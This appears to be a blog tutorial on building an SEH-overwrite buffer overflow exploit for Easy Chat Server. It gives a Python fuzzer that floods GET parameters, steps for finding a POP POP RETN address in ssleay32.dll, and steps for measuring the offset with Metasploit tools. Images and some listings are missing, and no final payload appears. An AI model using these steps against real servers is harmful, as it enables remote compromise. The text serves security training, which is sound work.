as shown in the image above, we can access the server using a browser in backtrck system.
Because this application is a web application, we will tap using wireshark.
From the above description, we can use the GET method to perform exploitation
Our first fuzzer :
#!/usr/bin/python
import socket
target="192.168.1.101"
target_port=80
data="\x41" * 5000
buff="GET /chat.ghp?username="+data+"&password="+data+"&room=1 HTTP/1.1\r\n"
buff+="Host:192.168.1.101\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target,target_port))
sock.send(buff+"\r\n\r\n")
print "Sukses....!!"
sock.close()
Now, we can see what happens in SEH chain (view + SEH chain).
Then, press Shift+F9, and look at this picture :
looking for a stepping stone
Finding a stepping stone is the file in which there is a command RETN POP POP. So, I choose ssleay.dll in easy chat server folder installation.
root@bt:/opt/metasploit/msf3# ./msfpescan -p /root/ssleay32.dll
we can use RETN POP POP commands that are in the address 0x1001b9a2
In OllyDbg select the menu view+Executable modules, then double click ssleay32.dll.
In this module window, right click+search for + Sequence of commands.
a new window will appear and fill it with the following command.
click find button and a new window will appear again.
seek offsets to overwrite SEH
In this step, we can use ./patter_create.rb
Then in OllyDbg will look like the following :
Then, press Shift+F9, and then we will know the contents of the EIP.
We can use patter_offset.rb to determine the number of bytes to EIP affected by the fuzzer.
with these results, we will modify our fuzzer as follows:
fuzzer run and look in OllyDbg.
Press shift+f9 and see what happens in EIP.
No comments:
Post a Comment